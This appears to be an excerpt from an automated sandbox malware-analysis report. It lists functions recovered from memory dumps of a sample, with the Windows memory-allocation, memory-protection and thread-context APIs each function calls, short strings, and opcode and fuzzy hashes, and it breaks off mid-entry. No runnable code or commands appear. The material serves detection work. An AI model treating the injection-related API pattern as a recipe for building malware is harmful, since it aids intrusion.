Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 512a2154aaf9af1fb4ea32d7880966734e431b67f3a70cc8bc9cf92bb76d70cc
Instruction ID: 44089100a2407ea2464490c9c9a79de9eaaf29a4297168bf4ca3b272b57f9458
Opcode Fuzzy Hash: 512a2154aaf9af1fb4ea32d7880966734e431b67f3a70cc8bc9cf92bb76d70cc
Instruction Fuzzy Hash: 453188B5D042589FCF10CFA9E984ADEFBB1FB59310F10942AE815B7210D735A946CF54

Function 05D21A78 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D21B22

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 12afc090b2f42d0255b7ea7b8ca4cf162abd90e060d79e1f338bda7c1cda0986
Instruction ID: c9c56129da54f969ad0ae03f7eda3726ec2cb53aa3fc42f6728855bb996849ac
Opcode Fuzzy Hash: 12afc090b2f42d0255b7ea7b8ca4cf162abd90e060d79e1f338bda7c1cda0986
Instruction Fuzzy Hash: 903188B9D042589FCF10CFA9D984ADEFBB1BB5A310F10A42AE815B7210D735A945CF58

Function 05D213C0 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05D21477

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 66f6a9211e9b5a9941b4efa58755b8c3fdb287ffcee714ac2c610e69084dc8ee
Instruction ID: e2a297eb7c583d582106236386442ae903dcd0f8b7632550b62218bfd04b7b90
Opcode Fuzzy Hash: 66f6a9211e9b5a9941b4efa58755b8c3fdb287ffcee714ac2c610e69084dc8ee
Instruction Fuzzy Hash: B141DEB5D002589FCB10DFA9D884AEEFBF1BF49314F24802AE409B7250D738A986CF54

Function 0184FC78 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0184FD1C

Memory Dump Source

Source File: 00000000.00000002.1689085036.0000000001840000.00000040.00000800.00020000.00000000.sdmp, Offset: 01840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1840000_download.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 953a93585e5c05d49b5b819ddd2a1cf0728a1b0aafbd7eb44010ac6f38e7d055
Instruction ID: b2a68d316fd7c77cc532aa911fcbba96513623d30f59678599e80cc9780e733f
Opcode Fuzzy Hash: 953a93585e5c05d49b5b819ddd2a1cf0728a1b0aafbd7eb44010ac6f38e7d055
Instruction Fuzzy Hash: 3431A7B4D012589FCF10CFA9D984ADEFBB1BF49310F20942AE914B7210DB35A945CF58

Function 05D213C8 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05D21477

Memory Dump Source

Source File: 00000000.00000002.1705620521.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d20000_download.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 63f2fad6244e7508d558eca7346eb164a90867b581f596fe0a4e9d94c62ef29d
Instruction ID: f7025512b642de3867d0aecaab20be9312440e208787b92acabfadd8ae2d671e
Opcode Fuzzy Hash: 63f2fad6244e7508d558eca7346eb164a90867b581f596fe0a4e9d94c62ef29d
Instruction Fuzzy Hash: A931BCB4D012589FCB10DFAAD884AEEFBF1BF49314F24802AE419B7250C738A985CF54

Function 05C0D130 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C0D4BB

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: fd3f2644c3e738cacff21e0465a824204e703b9120e1576992eb515ee3a36128
Instruction ID: 9ef0d1fecb27a08097618da01da4c72b5c288ee5206f707200d3d7037e858257
Opcode Fuzzy Hash: fd3f2644c3e738cacff21e0465a824204e703b9120e1576992eb515ee3a36128
Instruction Fuzzy Hash: 3BC14D75A002188FDB18DF69C945BDDBBF6BF88700F158499E509AB3A4CA31DD81CFA1

Function 05C07E08 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

Pl^q, xrefs: 05C07FF0

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: Pl^q
API String ID: 0-2831078282
Opcode ID: 0fff8896933da509ec98f8213a2b97caea9ea70e808e222c52723e9deb408b99
Instruction ID: acf0dd80992318050ca3dad85e9af08e1a18183116abe19093e7396eb0c29c07
Opcode Fuzzy Hash: 0fff8896933da509ec98f8213a2b97caea9ea70e808e222c52723e9deb408b99
Instruction Fuzzy Hash: E2910434B401148FCB18DF29C484A6A7BE6FF89714B1484A9E905DB3B5DB71ED42CBA1

Function 05C0C250 Relevance: 1.5, Strings: 1, Instructions: 221COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C0C47A

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 23f317eb6b138a4e4b43215fcf88fda341e540f4915e5ac49cb7d70c513638db
Instruction ID: d83739a66e7d81d606e78c079222108b4a4d36f1479e66981fe64eef98d25775
Opcode Fuzzy Hash: 23f317eb6b138a4e4b43215fcf88fda341e540f4915e5ac49cb7d70c513638db
Instruction Fuzzy Hash: 68A1FC34A10118CFCB14DFA4D99899DBBB2FF88300F119659E406AB3A4DB30EC46CF91

Function 05C0FA52 Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C0FB72

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: f432a7676893007f46e54d67b4eb66db451f40aa0d01f7b61fc43f76b9ea7ac6
Instruction ID: ea14e84de94b6bf2bb4116b27f3c166c6755fc95a36602d2186ce40d903d7777
Opcode Fuzzy Hash: f432a7676893007f46e54d67b4eb66db451f40aa0d01f7b61fc43f76b9ea7ac6
Instruction Fuzzy Hash: 1C714034B402149FDB14DB68C594BAEBBF6FF88710F105859E506AB3E4CB75DD828B90

Function 05C01EE8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

pbq, xrefs: 05C01F98

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 01f104e62f019858c2ea1a43acf37c1ce245ff0d054ec9fc1db7fbedb6d480a9
Instruction ID: 29c4869b0735b5a6b8e789432711605512f0eefbcefff46f9c4605a6cbe30437
Opcode Fuzzy Hash: 01f104e62f019858c2ea1a43acf37c1ce245ff0d054ec9fc1db7fbedb6d480a9
Instruction Fuzzy Hash: F0512C76640104AFCB459FA9C914D19BFF7FF8C3147198498E2098B376DA32DC62EB50

Function 05C0E630 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

(bq, xrefs: 05C0E6FB

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 803c57c782b3d9d16510691ea58a43758fb9a45924f8baafe4771233be610a97
Instruction ID: b709d643509682ec0e479afb116485d839393864ef17c6888caecf7480d975db
Opcode Fuzzy Hash: 803c57c782b3d9d16510691ea58a43758fb9a45924f8baafe4771233be610a97
Instruction Fuzzy Hash: BA41B4313442558FCB54DF3AD464A2E3BEAFF89611B1548A9E406CB3E2CE34DD02CBA1

Function 05851DED Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05852659

Memory Dump Source

Source File: 00000000.00000002.1704065985.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5850000_download.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: c33901300a68e1a6863aaa3b7d7c2cf031f31608d81d80541c243243a225b7be
Instruction ID: 4e8c94c8baa6ae5fa242f91e0766d484127f369e2e9ac80201f0a87421cc8de2
Opcode Fuzzy Hash: c33901300a68e1a6863aaa3b7d7c2cf031f31608d81d80541c243243a225b7be
Instruction Fuzzy Hash: E851AE34909349CFDB15CFA4D808BADBFB1EF45321F1481AAE891AB2A1CB385D45CB51

Function 05D6DEB0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

]X, xrefs: 05D6DFA2

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: ]X
API String ID: 0-837316541
Opcode ID: 977e50969ded9768b4e7b203a2acdd443e4c6dea2e95ded3311f02af4b18c5a2
Instruction ID: d8c7948aaa2f97dadc161d3a2be63be45b48e5207ae78f3719c13a26785464c5
Opcode Fuzzy Hash: 977e50969ded9768b4e7b203a2acdd443e4c6dea2e95ded3311f02af4b18c5a2
Instruction Fuzzy Hash: 8841E674E01209DFCB04DFA9D984AAEBBF6FB8D310F10842AE815A7355DB34A941CF50

Function 05D6DEAB Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

]X, xrefs: 05D6DFA2

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: ]X
API String ID: 0-837316541
Opcode ID: b0455c6055cd0afd3d500b272c0ce462dd1bbe3510efaa2f0125a24ac4b2b926
Instruction ID: b7233a14d9bddcb2315bab4b70c65220581fe93ed8334907009b2acb48124a5b
Opcode Fuzzy Hash: b0455c6055cd0afd3d500b272c0ce462dd1bbe3510efaa2f0125a24ac4b2b926
Instruction Fuzzy Hash: 6241E675E01209DFCB04DFA9D985AAEBBF6FB8C310F10842AE415A7355DB34A941CF50

Function 05C03D80 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C03DE3

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: f35779922106d9904261117d9de4ce1343ec6ec17bc678977ececdb4c671b22d
Instruction ID: 4971a5c12e9da90d3a16127b5c35293647057d157fb0c2088fc0bf94385a7d71
Opcode Fuzzy Hash: f35779922106d9904261117d9de4ce1343ec6ec17bc678977ececdb4c671b22d
Instruction Fuzzy Hash: 54419A357001058FCB05DF69C8909AEBBF2FF89710B108569E916DB3A1CB31ED068BE1

Function 05C0F901 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C0F9B7

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: f79e6778088da08477f89a3cfd1489ddea9fc8fda0add36b43583cecfefb1c16
Instruction ID: 1ba46688502a9c9e06c96db648505ab774b94a3cc8a409dd68af8d7a1c837b31
Opcode Fuzzy Hash: f79e6778088da08477f89a3cfd1489ddea9fc8fda0add36b43583cecfefb1c16
Instruction Fuzzy Hash: 24315E357406149FD718DB29C858B2A7BA6AFC8700F104868E606CB3A5DE75EC42C791

Function 05C0F910 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C0F9B7

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: b699ae9d1610e827fe4331a2400325c6ce4c07f291134cd0b95dc0e5881e44b8
Instruction ID: 965cd8d57abb866ec7d7790e63cd2c0184c455c06aeec7f0596b6926425e705d
Opcode Fuzzy Hash: b699ae9d1610e827fe4331a2400325c6ce4c07f291134cd0b95dc0e5881e44b8
Instruction Fuzzy Hash: 72314B357406149FD718DB29C998B2A7BE6AFCC704F104868E60A8B3A5DE75EC828790

Function 05C0B6D8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

4'^q, xrefs: 05C0B721

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 6e96f6d7fbfd84edbcf4d02d3b707e0fca572423af67ba4897b3f590fb1da9f2
Instruction ID: 23fb22d5310ef8854267f1b291fdc345c9a40f5403f0cb4ba133a2c9ad20c61c
Opcode Fuzzy Hash: 6e96f6d7fbfd84edbcf4d02d3b707e0fca572423af67ba4897b3f590fb1da9f2
Instruction Fuzzy Hash: AF317F36A402049FCB19DF64C9989AD7FB7FF88710B0544A8E5069B375DA31DC56CBA0

Function 058311FC Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0583129F

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0295a4692b70326ec870eb2f3165ceeece06e7b8af23341fb919d8a25ab4c7da
Instruction ID: 4e22530b04f7821da90861d780f50821b6f5ab4b4a57486674b73cc17a33a61e
Opcode Fuzzy Hash: 0295a4692b70326ec870eb2f3165ceeece06e7b8af23341fb919d8a25ab4c7da
Instruction Fuzzy Hash: 6A3198B4D052589FCF10CFA9D884ADEFBB1BF49310F10942AE819BB210D735A945CF94

Function 05831200 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0583129F

Memory Dump Source

Source File: 00000000.00000002.1704032898.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5830000_download.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7e049e0aa138d508f597a376da8659ccc1f1d192562ca6330839bf6c95ea3bc8
Instruction ID: 5c584660e605e17930380f2bd8520713bf79a177af6f4b4c28266698fd9a4502
Opcode Fuzzy Hash: 7e049e0aa138d508f597a376da8659ccc1f1d192562ca6330839bf6c95ea3bc8
Instruction Fuzzy Hash: B031A8B4D052589FCF10CFA9D884ADEFBB1BF49310F10942AE815B7210D735A945CF98

Function 05C069CF Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05C06A1A

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 1701374b8e00c849928b0c7962eaf868821ec8f19ca925a80ec9ccbd36645864
Instruction ID: b96ea8c4fc5485b3ef2e6efc37d40b8c18bd36593243364cf4cd567279b8be12
Opcode Fuzzy Hash: 1701374b8e00c849928b0c7962eaf868821ec8f19ca925a80ec9ccbd36645864
Instruction Fuzzy Hash: 37215B713041549FDB05DE2AC884EAA7BEAFF89610F149496F905CB3A1CB31DDA1DB60

Function 05C069E0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 05C06A1A

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: eb5ce2053dd345f46afc29367385d3c575812564c6463e6848d4158f7ee8911a
Instruction ID: 1186437ba103cd9120f03b57cab28ae17e948910afb0bc34f8b14a03cc69c0e1
Opcode Fuzzy Hash: eb5ce2053dd345f46afc29367385d3c575812564c6463e6848d4158f7ee8911a
Instruction Fuzzy Hash: 69217C703041549FCB05DF2AC880EAA7BEABF89700B148496FD45CB3A1CB31DDA1CB60

Function 05C03D70 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

,bq, xrefs: 05C03DE3

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 26dffbe1c5fa0067a1d64657a751a55f63172c00190cea99196d0334b22529e0
Instruction ID: 1847ca175d06b0fb135e62d7cc69549d0288e8043d6745513b36569a4c9a9673
Opcode Fuzzy Hash: 26dffbe1c5fa0067a1d64657a751a55f63172c00190cea99196d0334b22529e0
Instruction Fuzzy Hash: 4B118B357002459FCB00DF69C894AAFBBF6EF85700F158569E9059B3A2DB30ED01CBA1

Function 05D65F90 Relevance: 1.3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

Strings

/, xrefs: 05D66043

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: a4019c07ebd56834846f25acf145e35cbf5eefebb1198e8502a8ccd6aab71809
Instruction ID: 52ce8b3afbf62b4e4734e1520dc68dad3a139af5df759c9e5a2ed430a5cab664
Opcode Fuzzy Hash: a4019c07ebd56834846f25acf145e35cbf5eefebb1198e8502a8ccd6aab71809
Instruction Fuzzy Hash: 0811D674A4112A8FDB54DF65DD54BADBBB1FF88704F5040EA9909AB394CB305E81CF44

Function 05D65E9C Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

3, xrefs: 05D65EFA

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: 3
API String ID: 0-1842515611
Opcode ID: e3aabc6312e7b356b485441f954061bf7d0aa1e4497b70007ea345614ecc3771
Instruction ID: ad0c4b1bfe9eee341b18ff2cf855301c20368fa036fa924228d999d2032a4f58
Opcode Fuzzy Hash: e3aabc6312e7b356b485441f954061bf7d0aa1e4497b70007ea345614ecc3771
Instruction Fuzzy Hash: DCF01D7991435ACFCB65CF20C8987D8BBB1EB45324F1482D6D80993291DB359EC2CF40

Function 05D65F73 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

2, xrefs: 05D65F81

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: b7ba5899fcca903a685ceeade78278053851d2fd16e572fd9f2475b6eb07b151
Instruction ID: efe932cc7f51ed2d978dcbc09354c39e9724ccf5c4a7f2719be9b14f5ceb7a48
Opcode Fuzzy Hash: b7ba5899fcca903a685ceeade78278053851d2fd16e572fd9f2475b6eb07b151
Instruction Fuzzy Hash: B9F0A474906219CBCB65CF54D958B9ABBB6FB44314F1081EB8919A3294DB309E86CF41

Function 05A5C085 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

z, xrefs: 05A5CE1A

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: z
API String ID: 0-1657960367
Opcode ID: 7cf5341f57745ef90b87acf7c6b7df9bda2e96126b16f705efb7975f1c2bdf8c
Instruction ID: 5437ae984cbee675e001003bf0175bd8cc087fd4c991bcf03595319976aad087
Opcode Fuzzy Hash: 7cf5341f57745ef90b87acf7c6b7df9bda2e96126b16f705efb7975f1c2bdf8c
Instruction Fuzzy Hash: 44E0B67094A358CFDB64CF24D848FD9BBB2EB41314F0011A4C80A672A4CB791EC9CF44

Function 05A507FA Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

Y, xrefs: 05A52310

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: Y
API String ID: 0-3233089245
Opcode ID: c6ac50bc9f338e3f5251301670ab6790f221d843cc692dc23828473287535e9c
Instruction ID: 89148937f765640c972f9664a8533f2e6108feba3a8da63c76d9412dd93a9aa0
Opcode Fuzzy Hash: c6ac50bc9f338e3f5251301670ab6790f221d843cc692dc23828473287535e9c
Instruction Fuzzy Hash: 18E04278921228CFCB65CF60C855AADB7BABF45315F5091D9994962240C7315E81CF05

Function 05A59A44 Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

u, xrefs: 05A59A74

Memory Dump Source

Source File: 00000000.00000002.1704794390.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a50000_download.jbxd

Similarity

API ID:
String ID: u
API String ID: 0-4067256894
Opcode ID: b5eb8075f45a17146ca1028770de69b75b93935746f7ac40502312ea116b17b9
Instruction ID: bb877e77b1a69bdd537647be0dc2c3945970ad5fa1ced7394885e17bdf245240
Opcode Fuzzy Hash: b5eb8075f45a17146ca1028770de69b75b93935746f7ac40502312ea116b17b9
Instruction Fuzzy Hash: 7AD05EB0A4431C8FCB29DF25DC08B597BB6FB40300F104694D8096B244C7346E848F40

Function 05C03020 Relevance: 1.3, Strings: 1, Instructions: 5COMMON

Download Yara Rule

Strings

j, xrefs: 05C03029

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-2137352139
Opcode ID: af629a9df97cbd1dc1eaa02dcd77b705270915ef8ecb95493fbd6db5cdb699fd
Instruction ID: 8972fd93157c8ff8e863d2ba0b2285c61503417055082a47fcbabe6160d54a6a
Opcode Fuzzy Hash: af629a9df97cbd1dc1eaa02dcd77b705270915ef8ecb95493fbd6db5cdb699fd
Instruction Fuzzy Hash: A2C04C61C1C6D459DF16DBA4543C784BED16B16209F1C5EF898449188397A50015C562

Function 05D630AB Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3313812c0b76cd427587f07aae57e97eaade47949138a45128fc8b34f445ad92
Instruction ID: 7767cfc61de5f93e3ada91a32b7057d7cae28473939fb0c7539713d3e7f3a362
Opcode Fuzzy Hash: 3313812c0b76cd427587f07aae57e97eaade47949138a45128fc8b34f445ad92
Instruction Fuzzy Hash: FAC1F678E01218CFDB54DFA5D894B9DBBB2FB49310F1080AAD81AA7764CB349D85CF91

Function 05C03618 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea1e83774eade2d1bc78eb32bbad0ce1315bd918e60d022cc922843f67d1444
Instruction ID: 8910c0d7f53a5c58bea3f73b67c3545a407232bdd9da78c74d316dd93a6beca4
Opcode Fuzzy Hash: 4ea1e83774eade2d1bc78eb32bbad0ce1315bd918e60d022cc922843f67d1444
Instruction Fuzzy Hash: 00919035B052549FCB04CF69D949AADBBF6FF88710F248869E8129B390CB35DD41CBA0

Function 05C06B03 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd4130af357a5c41a64c96cdd4324c79df74f8ac4cf6b702c689e7f65a45b377
Instruction ID: 3418731257638269940bea8fb3fb9b4192b2ba06b827bdcd28deb5c015ad545d
Opcode Fuzzy Hash: dd4130af357a5c41a64c96cdd4324c79df74f8ac4cf6b702c689e7f65a45b377
Instruction Fuzzy Hash: E7A14C70E006698FDF15CFA5C845AFEBBB2FF48714F149554E812A7280DB389A96CB90

Function 05C08B68 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705020947.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c00000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e011cb151a56b42b9624914ab954313100bb131f5c34ee97cfef208f717c40
Instruction ID: 3781a60e4220bf171e9536327cb280d9d5b9e28649147ebde04de256d4c1047f
Opcode Fuzzy Hash: e5e011cb151a56b42b9624914ab954313100bb131f5c34ee97cfef208f717c40
Instruction Fuzzy Hash: 31812535A00219CFCB14DF69C58499EBBF6FF88710B1585A9E806DB3A1DB34ED42CB90

Function 05D62D40 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705647778.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d60000_download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c82e23670d450316fb601711cc477fea35fd84b3a9f768510ba9280c0395d40
Instruction ID: a480b4ed35b3fa34b7132e8849eacd390ced491fd070c698acc0e27fafbf8421
